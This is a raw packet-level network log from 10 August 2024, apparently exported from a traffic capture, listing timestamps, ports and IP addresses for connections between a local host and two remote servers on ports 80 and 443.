Aug 10, 2024 16:12:24.658838987 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.658847094 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.658871889 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.658886909 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.658902884 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.658905029 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.658940077 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.658971071 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.658986092 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.659003973 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.659008980 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.659034967 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.659066916 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.659112930 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.659502983 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.659550905 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.659552097 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.659598112 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.659604073 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.659653902 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.659676075 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.659687042 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.659704924 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.659718037 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.659742117 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.659749985 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.659778118 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.659790993 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.659804106 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.659837008 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.659843922 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.659868002 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.659910917 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.659919977 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.659965992 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.659970045 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.660001993 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.660027981 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.660037041 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.660049915 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.660082102 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.660089970 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.660130024 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.660136938 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.660161972 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.660196066 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.660198927 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.660204887 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.660231113 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.660238981 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.660263062 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.660270929 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.660295010 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.660326004 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.660341978 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.660357952 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.660361052 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.660388947 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.660404921 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.660419941 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.660438061 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.660450935 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.660478115 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.660495996 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.660501003 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.660543919 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.660551071 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.660586119 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.660599947 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.660617113 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.660639048 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.660648108 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.660675049 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.660680056 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.660685062 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.660712004 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.660743952 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.660774946 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.660785913 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.660805941 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.660839081 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.660887957 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.672962904 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.672993898 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.673011065 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.673072100 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.673086882 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.673103094 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.673119068 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.673150063 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.673182011 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.673196077 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.673196077 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.673230886 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.673259020 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.673274040 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.673307896 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.673340082 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.673388958 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.673420906 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.673449039 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.673497915 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.673513889 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.673513889 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.673533916 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.673564911 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.673614025 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.673623085 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.673623085 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.673666000 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.673717976 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.673748970 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.673799038 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.673804998 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.673804998 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.673830032 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.673861980 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.673892975 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.673937082 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.673937082 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.673945904 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.673995018 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.674004078 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.674026966 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.674074888 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.674078941 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.674107075 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.674155951 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.674205065 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.674236059 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.674268007 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.674278021 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.674278021 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.674315929 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.674350023 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.674381018 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.674413919 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.674453974 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.674453974 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.674453974 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.674468994 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.674501896 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.674551010 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.674570084 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.674582958 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.674616098 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.674643993 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.674649000 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.674679995 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.674699068 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.674729109 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.674762011 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.674810886 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.674843073 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.674865007 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.674865007 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.674875021 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.674906969 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.674937963 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.674966097 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.675013065 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.675013065 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.675013065 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.675013065 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.675015926 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.675067902 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.675070047 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.675098896 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.675129890 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.675146103 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.675180912 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.675230026 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.675261021 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.675311089 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.675342083 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.675352097 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.675352097 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.675374031 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.675405025 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.675436974 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.675467968 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.675498962 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.675529957 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.675561905 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.675575972 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.675575972 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.675575972 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.675575972 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.675590038 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.675620079 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.675652027 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.675661087 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.675662041 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.675684929 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.675704956 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.675718069 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.675750017 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.675779104 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.675786018 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.675791025 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.675834894 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.675867081 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.675894976 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.675942898 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.675975084 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.675982952 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.675982952 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.676007032 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.676039934 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.676089048 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.676098108 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.676098108 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.676098108 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.676120996 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.676135063 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.676170111 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.676202059 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.676225901 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.676233053 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.676265001 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.676296949 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.676328897 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.676361084 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.676373959 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.676373959 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.676373959 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.676373959 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.676393986 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.676424026 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.676435947 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.676435947 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.676456928 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.676467896 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.676542044 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.676589966 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.676611900 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.676623106 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.676656008 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.676682949 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.676712990 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.676743984 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.676743984 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.676745892 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.676774025 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.676805973 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.676837921 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.676837921 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.676837921 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.676868916 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.676903009 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.676934004 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.676964998 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.677005053 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.677011967 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.677011967 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.677011967 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.677037954 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.677069902 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.677102089 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.677108049 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.677108049 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.677134991 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.677166939 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.677200079 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.677212954 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.677313089 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.710104942 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.710128069 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.710314989 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.710321903 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.710972071 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.713680983 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.713711023 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.713730097 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.713752031 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.713767052 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.713777065 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.713782072 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.713789940 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.713797092 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.713807106 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.713809967 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.713835001 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.713856936 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.734518051 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.734530926 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.734615088 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.734618902 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.734890938 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.735176086 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.735188007 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.735290051 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.735295057 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.735454082 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.735660076 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.735711098 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.735783100 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.735786915 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.735919952 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.736248970 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.736260891 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.736337900 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.736342907 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.736507893 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.736738920 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.736751080 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.736810923 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.736814976 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.736958981 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.737463951 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.737477064 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.737555027 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.737559080 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.737725973 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.737931013 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.737943888 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.737994909 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.737998962 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.738195896 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.743413925 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.743465900 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.743499041 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.743546009 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.743575096 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.743606091 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.743640900 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.743671894 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.743702888 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.743724108 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.743733883 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.743746042 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.743766069 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.743776083 CEST	49739	80	192.168.2.4	147.45.44.104
